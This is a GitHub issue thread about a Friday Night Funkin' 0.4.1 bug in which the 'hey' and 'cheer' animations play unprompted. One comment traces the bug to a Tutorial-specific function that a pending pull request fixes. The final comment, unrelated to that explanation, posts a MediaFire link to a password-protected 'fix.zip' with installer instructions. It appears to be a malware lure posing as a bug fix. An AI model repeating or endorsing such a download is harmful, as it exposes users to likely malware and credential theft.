### ISSUE TITLE
Bug Report: Girlfriend and Boyfriend "hey" and "cheer" animation for no reason

### ISSUE THREAD

**Issue by Petya2288** [FunkinCrew/Funkin#3126]
### Issue Checklist

- [x] I have properly named the issue
- [X] I have checked the issues/discussions pages to see if the issue has been previously reported

### What platform are you using?

Itch.io (Downloadable Build) - Windows

### If you are playing on a browser, which one are you using?

None

### Version

0.4.1

### Context (Provide images, videos, etc.)

https://github.com/user-attachments/assets/d3ec1f5e-61d1-4730-b324-c17103a6eb60
If you create a new chart and choose boyfriend for playable character and girlfriend for opponent, there will be playing "hey" and "cheer" animation for no reason at the 18th and 27th seconds 

### Steps to reproduce (or crash logs, errors, etc.)

Create a new chart and choose boyfriend for playable character and girlfriend for opponent and check it

**Comment by AbnormalPoof** [comment]
This happens because of this function.
![Screenshot 2024-08-28 at 5 17 48 AM](https://github.com/user-attachments/assets/48ff01eb-b6ae-47b5-9f0b-eccdd5a3e984)

This function was made specifically for Tutorial for the `hey` and `cheer` animation events. It was probably made before the Play Animation Event was a thing.

There is a pull request that softcodes the Tutorial events, and in turn, fixes the bug (#3007). It is currently in the `0.5.0` milestone, so the fix will be in the next update.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
